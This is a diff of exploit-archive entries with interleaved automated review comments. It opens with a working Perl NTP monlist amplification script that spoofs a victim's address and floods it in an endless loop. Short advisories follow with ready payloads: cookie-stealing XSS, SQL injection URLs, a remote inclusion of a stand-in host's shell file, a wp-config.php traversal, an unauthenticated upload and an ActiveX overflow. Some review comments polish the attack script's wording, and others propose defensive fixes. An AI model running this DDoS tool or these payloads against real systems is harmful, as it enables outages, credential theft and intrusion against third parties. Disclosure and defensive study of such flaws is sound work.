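+# for traffic counts of connected clients. This
+# information is provided via the “monlist”
+# command. The basic attack technique consists
+# of an attacker sending a "get monlist" request
+# to a vulnerable NTP server, with the source
+# address spoofed to be the victim’s address.
+#
+#
+# Disclaimer:
+# This or previous program is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use at your own risk and educational
+# purpose ONLY!
+#
+# See also, UDP-based Amplification Attacks:
+# https://www.us-cert.gov/ncas/alerts/TA14-017A
+#
+#
+
+use Socket;
+
+if ( $< != 0 ) {
+print "Sorry, must be run as root!\n";
+print "This script use RAW Socket.\n";
+exit;
+}
+
+my $ntpd = (gethostbyname($ARGV[0]))[4]; # IP Address Destination (32 bits)
+my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits)
+
+print "[ ntpd MON_GETLIST query amplification ]\n";
+if (!defined $ntpd || !defined $victim) {
+print "[ Usg: $0 <ntp server> <victim>\n";
+print "[ <todor.donev\@gmail.com> Todor Donev ]\n";
+exit;
+}
+print "[ Sending NTP packets: $ARGV[0] -> $ARGV[1]\n";
+socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
+setsockopt(RAW, 0, 1, 1) or die $!;
+main();
+
+# Main program
+sub main {
+my $packet;
+
+$packet = iphdr();
+$packet .= udphdr();
+$packet .= ntphdr();
+# b000000m...
+send_packet($packet);
+}
+
+# IP header (Layer 3)
+sub iphdr {
+my $ip_ver = 4; # IP Version 4 (4 bits)
+my $iphdr_len = 5; # IP Header Length (4 bits)
+my $ip_tos = 0; # Differentiated Services (8 bits)
+my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
+my $ip_frag_id = 0; # Identification Field (16 bits)
+my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
+my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
+my $ip_ttl = 255; # IP TTL (8 bits)
+my $ip_proto = 17; # IP Protocol (8 bits)
+my $ip_checksum = 0; # IP Checksum (16 bits)
+
+# IP Packet
+my $iphdr = pack(
+'H2 H2 n n B16 h2 c n a4 a4',
+$ip_ver . $iphdr_len, $ip_tos,
+$ip_total_len, $ip_frag_id,
+$ip_frag_flag . $ip_frag_offset,
+$ip_ttl, $ip_proto, $ip_checksum,
+$victim, $ntpd
+);
+return $iphdr;
+}
+
+# UDP Header (Layer 4)
+sub udphdr {
+my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
+my $udp_dst_port = 123; # UDP Dest Port (16 btis) (0-65535)
+my $udp_len = 8 + length(ntphdr()); # UDP Length (16 bits) (0-65535)
+my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)
+
+# UDP Packet
+my $udphdr = pack(
+'n n n n',
+$udp_src_port,
+$udp_dst_port,
+$udp_len,
+$udp_checksum
+);
+return $udphdr;
+}
+
+# NTP Header (Layer 7)
+sub ntphdr {
+my $rm_vn_mode = 0x27;
+
+# Response bit to 0, More bit to 0, Version field to 2, Mode field to 7
+#
+# A mode 7 packet is used exchanging data between an NTP server
+# and a client for purposes other than time synchronization, e.g.
+# monitoring, statistics gathering and configuration. A mode 7
+# packet has the following format:
+#
+# 0 1 2 3
+# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+# |R|M| VN | Mode|A| Sequence | Implementation| Req Code |
+# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+# | Err | Number of data items | MBZ | Size of data item |
+# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+# | |
+# | Data (Minimum 0 octets, maximum 500 octets) |
+# | |
+# | [...] |
+# | |
+# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+# | Encryption Keyid (when A bit set) |
+# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+# | |
+# | Message Authentication Code (when A bit set) |
+# | |
+# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+#
+# where the fields are (note that the client sends requests, the server
+# responses):
+# Response Bit: This packet is a response (if clear, packet is a request).
+# More Bit: Set for all packets but the last in a response which
+# requires more than one packet.
+# Version Number: 2 for current version
+# Mode: Always 7
+my $auth = 0x00; # If set, this packet is authenticated.
+
+my $implementation = 0x03; # Iimplementation: 0x00 (UNIV), 0x02 (XNTPD_OLD), 0x03 (XNTPD)
+# The number of the implementation this request code
+# is defined by. An implementation number of zero is used
+# for requst codes/data formats which all implementations
+# agree on. Implementation number 255 is reserved (for
+# extensions, in case we run out).
+
+my $request = 0x2a; # Request code is an implementation-specific code which specifies the
+# operation to be (which has been) performed and/or the
+# format and semantics of the data included in the packet
+# 0x02 (PEER_INFO), 0x03 (PEER_STATS), 0x04 (SYS_INFO),
+# 0x04 (SYS_STATS), 0x2a (MON_GETLIST)
+# NTP packet
+my $ntphdr = pack(
+'W2 C2 C2 C2',
+$rm_vn_mode,
+$auth,
+$implementation,
+$request
+);
+return $ntphdr;
+}
+
+sub send_packet {
+while(1){
+select(undef, undef, undef, 0.30); # Sleep 300 milliseconds
+send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $ntpd)) or die $!;
+}
+}
+
+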
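Review bot: The usage line prints `[ Usg: $0 <ntp server> <victim>`; `Usg` should be `Usage`, matching the sibling script 37561.pl in this commit. Several comments carry typos that make the header harder to search: `# UDP Sort Port` → `# UDP Source Port`, `(16 btis)` → `(16 bits)`, `# Iimplementation:` → `# Implementation:`, and `for requst codes` → `for request codes`. Inside ntphdr() the one line that explains the 0x27 value, `# Response bit to 0, More bit to 0, Version field to 2, Mode field to 7`, is separated from `my $rm_vn_mode = 0x27;` by a blank line and then followed by the long packet-format description, so moving that single line directly above the assignment would keep the value and its explanation together. The ASCII diagram's column alignment appears lost in this rendering and cannot be checked here.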
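--- a/platforms/php/webapps/37537.txt
+++ b/platforms/php/webapps/37537.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/54660/info
+
+phpProfiles is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities could allow an attacker to execute malicious code within the context of the web server process, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+phpProfiles 4.5.4 Beta is vulnerable; other versions may also be affected.
+
+http://www.example.com/full_release/community.php?action=showtopic&comm_id=00001&topic_id=0000000009&topic_title=[XSS]
+http://www.example.com/full_release/community.php?comm_id=[SQL]
+http://www.example.com/Full_Release/include/body_admin.inc.php?menu=http://www.example1.com/shell.txt?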
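--- /dev/null
+++ b/platforms/php/webapps/37539.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/54670/info
+
+REDAXO is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+REDAXO 4.4 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/redaxo/index.php?page=user&subpage=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E
+
+http://www.example.com/redaxo/index.php?page=template&subpage=%22%3E%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E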
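--- /dev/null
+++ b/platforms/php/webapps/37540.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54677/info
+
+Odudeprofile Component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Odudeprofile 2.7 and 2.8 are vulnerable; prior versions may also be affected.
+
+http://www.example.com/index.php?option=com_odudeprofile&view=search&profession=(SQL)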
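--- /dev/null
+++ b/platforms/php/webapps/37541.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54698/info
+
+tekno.Portal is prone to an SQL-injection vulnerability.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+tekno.Portal 0.1b is vulnerable; other versions may also be affected.
+
+http://www.example.com/teknoportal/anket.php?id=[SQLi]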
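--- /dev/null
+++ b/platforms/php/webapps/37544.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54715/info
+
+ocPortal is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks; other attacks are possible.
+
+Versions prior to ocPortal 7.1.6 are vulnerable.
+
+http://www.example.com/ocportal/index.php?page=login&type=misc&redirect=http://example1.com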
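--- /dev/null
+++ b/platforms/php/webapps/37547.txt
@@ -0,0 +1,38 @@
+source: http://www.securityfocus.com/bid/54725/info
+
+Scrutinizer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Scrutinizer 9.5.0 is vulnerable; other versions may also be affected.
+
+#Request 1
+GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
+Host: A.B.C.D
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Proxy-Connection: keep-alive
+
+#Response 1
+<snip>
+<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
+<snip>
+
+#Request 2
+GET /d4d/exporters.php HTTP/1.1
+Host: A.B.C.D
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
+Connection: close
+Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
+Content-Length: 2
+
+#Response 2
+<snip>
+<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
+<snip>
+
+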
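Review bot: Response 1 does not match Request 1: the `href` attribute shows `alert(1)` while the link text and the request both carry `alert(123)`, so one of the two was edited after capture and the reflected value cannot be confirmed from the transcript as stored. Request 2 sends `Content-Length: 2` on a GET with no body, which is harmless but is another sign the capture was hand-edited. The second case shows the `Referer` header reflected unescaped into an anchor, and that deserves its own sentence in the description since it is the less obvious of the two sinks and the one an output-encoding fix is most likely to miss.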
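--- /dev/null
+++ b/platforms/php/webapps/37548.txt
@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/54726/info
+
+Scrutinizer is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+Scrutinizer 9.5.0 is vulnerable; other versions may also be affected.
+
+#Request
+POST /d4d/uploader.php HTTP/1.0
+Host: A.B.C.D
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
+Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
+Content-Length: 210
+
+
+--_Part_949_3365333252_3066945593
+Content-Disposition: form-data;
+name="uploadedfile"; filename="trustwave.txt"
+Content-Type: application/octet-stream
+
+trustwave
+
+--_Part_949_3365333252_3066945593--
+
+#Response
+HTTP/1.1 200 OK
+Date: Wed, 25 Apr 2012 17:39:15 GMT
+Server: Apache
+X-Powered-By: PHP/5.3.3
+Vary: Accept-Encoding
+Content-Length: 41
+Connection: close
+Content-Type: text/html
+
+{"success":1,"file_name":"trustwave.txt"}
+
+#Confirming on File System
+C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
+trustwave
+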
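Review bot: The upload request carries no `Cookie` or `Authorization` header, so if the transcript is complete the `uploader.php` endpoint accepted the file with no session at all; the report should state explicitly whether authentication is required, because that single fact decides the severity. The confirmation step shows the client-supplied name `trustwave.txt` stored unchanged under `snmp\mibs`, which is the detail a defender needs: the handler trusts the `filename=` field, and the fix is to assign the stored name server-side and restrict the accepted extensions to what the application expects. The `Content-Disposition: form-data;` header appears to have been wrapped onto two lines, so the body as printed would not parse as multipart if replayed verbatim.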
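--- /dev/null
+++ b/platforms/php/webapps/37551.txt
@@ -0,0 +1,39 @@
+source: http://www.securityfocus.com/bid/54734/info
+
+phpBB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+phpBB 3.0.10 is vulnerable; other versions may also be affected.
+
+Request :
+
+---
+POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Proxy-Connection: keep-alive
+Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
+Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 258
+Connection: close
+
+viewemail=1
+&massemail=1
+&allowpm=1
+&hideonline=0
+¬ifypm=1
+&popuppm=0
+&lang=en
+&style=%2b1111111111
+&tz=0
+&dst=0
+&dateoptions=D+M+d%2C+Y+g%3Ai+a
+&dateformat=D+M+d%2C+Y+g%3Ai+a
+&submit=Submit
+&creation_time=1343370877
+&form_token=576...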
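Review bot: The body line `¬ifypm=1` is very likely `&notifypm=1` with `&not` decoded as an HTML entity somewhere between submission and storage, so the parameter name should be restored; as stored the transcript does not describe the request that was sent. The report also never names the parameter that carries the injection — `&style=%2b1111111111` is the only value that is not an ordinary preference setting, and if that is the injection point the text should say so instead of leaving the reader to infer it. `Content-Length: 258` cannot be checked against the body because `form_token=576...` is truncated, which is fine, but the truncation should be stated.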
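--- /dev/null
+++ b/platforms/php/webapps/37552.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54739/info
+
+JW Player is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Note: The vulnerability related to 'logo.link' parameter has been moved to BID 55199 for better documentation.
+
+http://www.example.com/player.swf?playerready=alert(document.cookie)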
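--- /dev/null
+++ b/platforms/php/webapps/37553.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54741/info
+
+eNdonesia is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+eNdonesia 8.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/eNdonesia/mod.php?mod=diskusi&op=viewcat&cid=-[id][SQL INJECTION]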
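--- /dev/null
+++ b/platforms/php/webapps/37554.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/54753/info
+
+Limny is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Limny 3.3.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/limny-3.3.1/index.php?q=-1' or 57 = '55 [SQL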
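--- /dev/null
+++ b/platforms/php/webapps/37556.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/54757/info
+
+Distimo Monitor is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Distimo Monitor 6.0 is vulnerable; other versions may also be affected.
+
+https://www.example.com/downloads/date/metric:1/country:29/application:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/appstore:1
+https://www.example.com/downloads/date/metric:1/country:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/application:99/appstore:1
+https://www.example.com/downloads/map/metric:%3E%22%3Ciframe%20src=http://www.example1.com%3E+%3E%22%3Ciframe%20src=http://www.example1.com%3E
+https://www.example.com/revenue/date/application:99/country:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com%3E
+https://www.example.com/revenue/date/application:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com/country:30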
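--- /dev/null
+++ b/platforms/php/webapps/37559.txt
@@ -0,0 +1,62 @@
+# Exploit Title: WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]
+# Date: 2015-07-10
+# Google Dork:
+# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
+# Vendor Homepage: http://wordpress.dwbooster.com/
+# Software Link: https://downloads.wordpress.org/plugin/cp-image-store.1.0.5.zip
+# Version: 1.0.5
+# Tested on: windows 7 + firefox.
+
+====================
+DESCRIPTION
+====================
+
+A vulnerability has been detected in the WordPress CP Image Store with Slideshow plugin in version 1.0.5 .
+The vulnerability allows remote attackers to download arbitrary files from the server.
+The Arbitrary file download vulnerability is located in the `cp-image-store.php` file.
+
+The web vulnerability can be exploited by remote attackers without privileged application user account
+and without required user interaction. Successful exploitation of the Arbitrary file download vulnerability results
+in application compromise.
+
+==============
+POC
+==============
+
+# http://wp-host/wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=../../../../wp-config.php HTTP/1.1
+
+the purchase_id parameter can be bruteforced and succesfully exploit this vulnerability.
+
+
+==================
+VULNERABLE CODE
+==================
+
+Located in cp-image-store.php
+
+function cpis_download_file(){
+...
+
+if( isset( $_REQUEST[ 'f' ] ) && cpis_check_download_permissions() ){
+header( 'Content-Type: '.cpis_mime_content_type( basename( $_REQUEST[ 'f' ] ) ) );
+header( 'Content-Disposition: attachment; filename="'.$_REQUEST[ 'f' ].'"' );
+if( cpis_checkMemory( array( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ) ) ){
+readfile( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] );
+}else{
+@unlink( CPIS_DOWNLOAD.'/.htaccess');
+header( 'location:'.CPIS_PLUGIN_URL.'/downloads/'.$_REQUEST[ 'f' ] );
+}
+...
+}
+
+==================================
+
+time-line
+
+2015-07-01: vulnerability found
+2015-07-09: reported to vendor
+2015-07-10: released CP Image Store with Slideshow new version 1.0.6
+2015-07-10: full disclosure
+
+===================================
+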
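Review bot: The handler quoted under VULNERABLE CODE concatenates `$_REQUEST[ 'f' ]` straight into `CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ]` and into the `Content-Disposition` header, so `cpis_check_download_permissions()` gates who may download but never which path is read; the report would be more useful to maintainers if it stated the fix next to the PoC. The defensive shape is to reduce the value to a file name and confirm the resolved path stays inside the download directory before any `header()` or `readfile()`: `$f = basename( $_REQUEST[ 'f' ] );` then `$path = realpath( CPIS_DOWNLOAD . '/' . $f );` and a check that `$path` is not false and starts with `realpath( CPIS_DOWNLOAD )`. The else branch's `@unlink( CPIS_DOWNLOAD.'/.htaccess');` also appears to remove whatever access control that file provided for the download directory, and that side effect outlives the request, so it deserves a separate mention. The quoted function is elided with `...` on both sides, so the rest of its body is not visible here.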
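--- /dev/null
+++ b/platforms/php/webapps/37560.txt
@@ -0,0 +1,91 @@
+# Exploit Title: WordPress cp-multi-view-calendar.1.1.7 [Unauthenticated SQL injection vulnerabilities]
+# Date: 2015-07-10
+# Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar
+# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
+# Vendor Homepage: http://wordpress.dwbooster.com/
+# Software Link: https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.7.zip
+# Version: 1.1.7
+# Tested on: windows 7 + sqlmap 0.9.
+# OWASP Top10: A1-Injection
+
+
+====================
+DESCRIPTION
+====================
+
+Multiple SQL Injection vulnerabilities has been detected in the Wordpress cp-multi-view-calendar plugin in version 1.1.7 .
+The vulnerability allows remote attackers to inject own sql commands to compromise the affected web-application and connected dbms.
+
+The SQL Injection vulnerabilities are located in the `edit.php` and `datafeed.php` files.
+Remote attackers are able to inject own sql commands to the vulnerable parameters value in these files GET/POST method request.
+
+The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account
+and without required user interaction. Successful exploitation of the sql injection vulnerability results in application and
+web-service or dbms compromise.
+
+===================
+Severity Level
+===================
+Critical
+
+
+=================================
+AFFECTED URLs AND PARAMETER(S)
+=================================
+
+http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=[SQLi]
+
+Vulnerable parameter: `id`
+
+Explotation technique: blind (time-based) , union query based.
+
+-------------------------------------------------------------------
+
+http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=remove&rruleType=del_only&calendarId=[SQLi]
+
+Vulnerable parameter: `calendarId`
+
+Explotation technique: blind (boolean based, time based), error based.
+
+-----------------------------------------------------------------------
+
+http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=adddetails&id=1&calid=[SQLi]
+
+Vulnerable parameter: `calid`
+
+Explotation technique: blind (boolean based, time based)
+
+-----------------------------------------------------------------------
+
+
+it isn't all sqli vulnerabilities, but these are the vulnerable functions:
+
+
+In file datafeed.php
+
+-checkIfOverlapping(...)
+-updateDetailedCalendar(...)
+-removeCalendar(...)
+
+
+In file edit.php
+
+-getCalendarByRange(...)
+
+
+... I think this is all..
+
+
+Sorry. I didn't have much time for this report.
+
+==================================
+
+time-line
+
+2015-07-01: vulnerabilities found
+2015-07-09: reported to vendor
+2015-07-10:
+2015-07-12:
+
+===================================
+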
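Review bot: The time-line leaves `2015-07-10:` and `2015-07-12:` with no event, so a reader cannot tell whether a fixed release exists or when disclosure happened; either fill the entries or drop them, since a dated line with nothing after it reads as a vendor silence that the report does not actually claim. `Explotation technique` is misspelled three times and should read `Exploitation technique`. The three affected URLs point at `http://localhost/wordpress/`, which should be labelled as the tester's local install so it is not mistaken for a generic path, and the list of vulnerable functions would be easier to act on if each function were paired with the parameter it reads.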
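--- /dev/null
+++ b/platforms/windows/dos/37526.txt
@@ -0,0 +1,39 @@
+# Title: Immunity Debugger - Crash
+# Date: 08/07/2015
+# Author: Arsyntex
+# Vendor Homepage: http://www.immunityinc.com/products/debugger/
+# Version: v1.85
+# Tested on: Windows 8.1 Pro
+
+Incorrect path/file EXtEnsion parsing.
+
+-Create folder with the name: .exe.exe and put any program inside and try debug it.
+-Try to debug an executable with the name: test.exe.exe or lib.exe.dll
+
+The "OpenEXEfile" function does not check if the return value of strchr() is zero.
+----------------------------------------------------------------------------------
+loc_4B8182:
+
+mov [esp+10h+var_10], edi
+add edi, 4
+mov [esp+10h+var_C], 20h
+mov [esp+10h+arg_24], eax
+call strchr ; return EAX=3D 0
+mov [esp+10h+var_10], eax
+mov [esp+10h+arg_28], eax ; (!)
+call strlen ; ntdll.strlen(s)
+
+---------------------------------------------------------------------
+ntdll.strlen(s) - NULL parameter
+---------------------------------------------------------------------
+ntdll_strlen:
+
+mov ecx, [esp+4] ; [esp+4] =3D 0 NULL pointer
+test ecx, 3 ; ...
+jz short loc_77C77510 ; jump
+...
+
+loc_77C77510:
+
+mov eax, [ecx] ; Access Violation
+---------------------------------------------------------------------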
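Review bot: The disassembly comments `; return EAX=3D 0` and `; [esp+4] =3D 0 NULL pointer` carry quoted-printable residue — `=3D` is the encoding of `=` — so the listing should read `EAX = 0` and `[esp+4] = 0`. The `loc_4B8182` address is given without saying which module it belongs to, so the offset is only reproducible against the exact `v1.85` build named in the header; one sentence stating the module and that the address is build-specific would help anyone checking a later version. The fix the report implies but never states is the one worth writing down: `OpenEXEfile` must test the `strchr` result for NULL before handing it to `strlen`.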
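--- /dev/null
+++ b/platforms/windows/dos/37558.txt
@@ -0,0 +1,21 @@
+# Title: Notepad++ - Crash
+# Date: 10/07/2015
+# Author: Rahul Pratap Singh (@0x62626262)
+# Vendor Homepage: https://notepad-plus-plus.org
+# Download: https://notepad-plus-plus.org/download/v6.7.3.html
+# Version: v6.7.3
+# Tested on: Windows_XP_x86 & Windows_7_x86
+
+Incorrect theme file parsing, that leads to crash.
+
+-Create a .xml file with numbereous "A" (around 1000) in it and save as
+test.xml
+-Go to this directory in windows "/appdata/roaming/notepad++/themes/" and
+paste above test.xml file in this theme folder and restart notepad++
+-Now start notepad++ and in menu tab, go in settings and then select style
+configurator and now select test file in theme select option
+-Now hit "save and close" button, it will crash with an error message
+
+Thanks
+
+Rahul Pratap Singh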
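--- /dev/null
+++ b/platforms/windows/remote/37542.html
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/54701/info
+
+BarCodeWiz ActiveX control is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied input.
+
+An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control.
+
+Successful exploits will allow attackers to execute arbitrary code within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition.
+
+BarCodeWiz 4.0.0.0 is vulnerable to this issue; other versions may be affected as well.
+
+<html>
+Exploit
+<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc'
+/></object>
+<script language='vbscript'>
+targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX
+Trial\DLL\BarcodeWiz.dll"
+prototype = "Property Let Barcode As String"
+memberName = "Barcode"
+progid = "BARCODEWIZLib.BarCodeWiz"
+argCount = 1
+arg1=String(14356, "A")
+poc.Barcode = arg1
+</script>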
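Review bot: `<object classid='clsid:...' id='poc' />` followed by `</object>` both self-closes and closes the element; `<object>` is not a void element, so the stray `/>` should become `>` and the closing tag kept. `<script language='vbscript'>` uses the obsolete `language` attribute, and the assignments to `targetFile`, `prototype`, `memberName`, `progid` and `argCount` are never read by the script, so they look like generator output rather than part of the test case and could be dropped or turned into a comment. The file also mixes the advisory prose with the markup at top level and has no `<head>`, `<title>` or `<body>`; that is tolerable for a crash reproducer, but a one-line comment saying the prose is intentional would stop it being mistaken for a truncated page.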